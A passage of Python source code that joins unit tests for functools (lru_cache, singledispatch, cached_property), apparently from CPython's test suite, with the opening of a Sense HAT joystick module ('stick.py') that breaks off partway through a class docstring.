@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with threading_helper.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
def test_lru_cache_parameters(self):
@self.module.lru_cache(maxsize=2)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 2, "typed": False})
@self.module.lru_cache(maxsize=1000, typed=True)
def f():
return 1
self.assertEqual(f.cache_parameters(), {'maxsize': 1000, "typed": True})
def test_lru_cache_weakrefable(self):
@self.module.lru_cache
def test_function(x):
return x
class A:
@self.module.lru_cache
def test_method(self, x):
return (self, x)
@staticmethod
@self.module.lru_cache
def test_staticmethod(x):
return (self, x)
refs = [weakref.ref(test_function),
weakref.ref(A.test_method),
weakref.ref(A.test_staticmethod)]
for ref in refs:
self.assertIsNotNone(ref())
del A
del test_function
gc.collect()
for ref in refs:
self.assertIsNone(ref())
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_method_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
self.arg = "base"
@t.register(int)
def _(self, arg):
self.arg = "int"
@t.register(str)
def _(self, arg):
self.arg = "str"
a = A()
a.t(0)
self.assertEqual(a.arg, "int")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t('')
self.assertEqual(a.arg, "str")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t(0.0)
self.assertEqual(a.arg, "base")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
def test_staticmethod_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register(int)
@staticmethod
def _(arg):
return isinstance(arg, int)
@t.register(str)
@staticmethod
def _(arg):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_callable_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@A.t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@A.t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_abstractmethod_register(self):
class Abstract(abc.ABCMeta):
@functools.singledispatchmethod
@abc.abstractmethod
def add(self, x, y):
pass
self.assertTrue(Abstract.add.__isabstractmethod__)
def test_type_ann_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
return "base"
@t.register
def _(self, arg: int):
return "int"
@t.register
def _(self, arg: str):
return "str"
a = A()
self.assertEqual(a.t(0), "int")
self.assertEqual(a.t(''), "str")
self.assertEqual(a.t(0.0), "base")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Iterable[str] is not a class.'
))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
class CachedCostItem:
_cost = 1
def __init__(self):
self.lock = py_functools.RLock()
@py_functools.cached_property
def cost(self):
"""The cost of the item."""
with self.lock:
self._cost += 1
return self._cost
class OptionallyCachedCostItem:
_cost = 1
def get_cost(self):
"""The cost of the item."""
self._cost += 1
return self._cost
cached_cost = py_functools.cached_property(get_cost)
class CachedCostItemWait:
def __init__(self, event):
self._cost = 1
self.lock = py_functools.RLock()
self.event = event
@py_functools.cached_property
def cost(self):
self.event.wait(1)
with self.lock:
self._cost += 1
return self._cost
class CachedCostItemWithSlots:
__slots__ = ('_cost')
def __init__(self):
self._cost = 1
@py_functools.cached_property
def cost(self):
raise RuntimeError('never called, slots not supported')
class TestCachedProperty(unittest.TestCase):
def test_cached(self):
item = CachedCostItem()
self.assertEqual(item.cost, 2)
self.assertEqual(item.cost, 2) # not 3
def test_cached_attribute_name_differs_from_func_name(self):
item = OptionallyCachedCostItem()
self.assertEqual(item.get_cost(), 2)
self.assertEqual(item.cached_cost, 3)
self.assertEqual(item.get_cost(), 4)
self.assertEqual(item.cached_cost, 3)
def test_threaded(self):
go = threading.Event()
item = CachedCostItemWait(go)
num_threads = 3
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
threads = [
threading.Thread(target=lambda: item.cost)
for k in range(num_threads)
]
with threading_helper.start_threads(threads):
go.set()
finally:
sys.setswitchinterval(orig_si)
self.assertEqual(item.cost, 2)
def test_object_with_slots(self):
item = CachedCostItemWithSlots()
with self.assertRaisesRegex(
TypeError,
"No '__dict__' attribute on 'CachedCostItemWithSlots' instance to cache 'cost' property.",
):
item.cost
def test_immutable_dict(self):
class MyMeta(type):
@py_functools.cached_property
def prop(self):
return True
class MyClass(metaclass=MyMeta):
pass
with self.assertRaisesRegex(
TypeError,
"The '__dict__' attribute on 'MyMeta' instance does not support item assignment for caching 'prop' property.",
):
MyClass.prop
def test_reuse_different_names(self):
"""Disallow this case because decorated function a would not be cached."""
with self.assertRaises(RuntimeError) as ctx:
class ReusedCachedProperty:
@py_functools.cached_property
def a(self):
pass
b = a
self.assertEqual(
str(ctx.exception.__context__),
str(TypeError("Cannot assign the same cached_property to two different names ('a' and 'b')."))
)
def test_reuse_same_name(self):
"""Reusing a cached_property on different classes under the same name is OK."""
counter = 0
@py_functools.cached_property
def _cp(_self):
nonlocal counter
counter += 1
return counter
class A:
cp = _cp
class B:
cp = _cp
a = A()
b = B()
self.assertEqual(a.cp, 1)
self.assertEqual(b.cp, 2)
self.assertEqual(a.cp, 1)
def test_set_name_not_called(self):
cp = py_functools.cached_property(lambda s: None)
class Foo:
pass
Foo.cp = cp
with self.assertRaisesRegex(
TypeError,
"Cannot use cached_property instance without calling __set_name__ on it.",
):
Foo().cp
def test_access_from_class(self):
self.assertIsInstance(CachedCostItem.cost, py_functools.cached_property)
def test_doc(self):
self.assertEqual(CachedCostItem.cost.__doc__, "The cost of the item.")
if __name__ == '__main__':
unittest.main()
|
stick.py
|
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Alternative API for the Sense HAT
# Copyright (c) 2016-2018 Dave Jones <dave@waveform.org.uk>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Defines the :class:`SenseStick` class representing the Sense HAT's joystick.
"""
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
import io
import os
import glob
import errno
import struct
import select
import warnings
import termios
from datetime import datetime
from collections import namedtuple
from threading import Thread, Event, Lock
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
from .exc import SenseStickBufferFull, SenseStickCallbackRead
# native_str represents the "native" str type (bytes in Py 2, unicode in Py 3)
# of the interpreter; str is then redefined to always represent unicode
native_str = str # pylint: disable=invalid-name
str = type('') # pylint: disable=redefined-builtin,invalid-name
class StickEvent(namedtuple('StickEvent',
('timestamp', 'direction', 'pressed', 'held'))):
"""
Represents a joystick event as a :func:`~collections.namedtuple`. The
fields of the event are defined below:
.. attribute:: timestamp
A :class:`~datetime.datetime` object specifying when the event took
place. This timestamp is derived from the kernel event so it should be
accurate even when callbacks have taken time reacting to events. The
timestamp is a naive :class:`~datetime.datetime` object in local time.
.. attribute:: direction
A string indicating which direction the event pertains to. Can be one
of "up", "down", "leftʺ, "right", or "enter" (the last event refers to
the joystick being pressed inward).
.. attribute:: pressed
A bool which is ``True`` when the event indicates that the joystick is
being pressed *or held* in the specified direction. When this is
``False``, the event indicates that the joystick has been released from
the specified direction.
.. attribute:: held
A bool which is ``True`` when the event indicates that the joystick
direction is currently held down (when :attr:`pressed` is also
``True``) or that the direction was *previously* held down (when
:attr:`pressed` is ``False`` but :attr:`held` is still ``True``).
"""
__slots__ = ()
class SenseStick(object):
"""
The :class:`SenseStick` class represents the joystick on the Sense HAT.
Users can either instantiate this class themselves, or can access an
instance from :attr:`SenseHAT.stick`.
The :meth:`read` method can be called to obtain :class:`StickEvent`
instances, or the instance can be treated as an iterator in which case
events will be yielded as they come in::
hat = SenseHAT()
for event in hat.stick:
if event.pressed and not event.held:
print('%s pressed!' % event.direction)
Alternatively, handler functions can be assigned to the attributes
:attr:`when_up`, :attr:`when_down`, :attr:`when_left`, :attr:`when_right`,
:attr:`when_enter`. The assigned functions will be called when any matching
event occurs.
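For example, the following sketch (assuming ``SenseHAT`` has been imported
from this package) prints a message each time the joystick is pushed up::
hat = SenseHAT()
def pushed_up(event):
    if event.pressed and not event.held:
        print('Up pressed!')
hat.stick.when_up = pushed_up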
Finally, the attributes :attr:`up`, :attr:`down`, :attr:`left`,
:attr:`right`, and :attr:`enter` can be polled to determine the current
state of the joystick.
The :attr:`rotation` attribute can be modified to alter the orientation of
events, and the aforementioned attributes.
The *max_events* parameter controls the size of the internal queue used to
buffer joystick events. This defaults to 100 which should be more than
sufficient to ensure events are not lost. The *flush_input* parameter,
which defaults to ``True``, controls whether, when the instance is closed,
it attempts to flush the stdin of the owning terminal. This is useful as
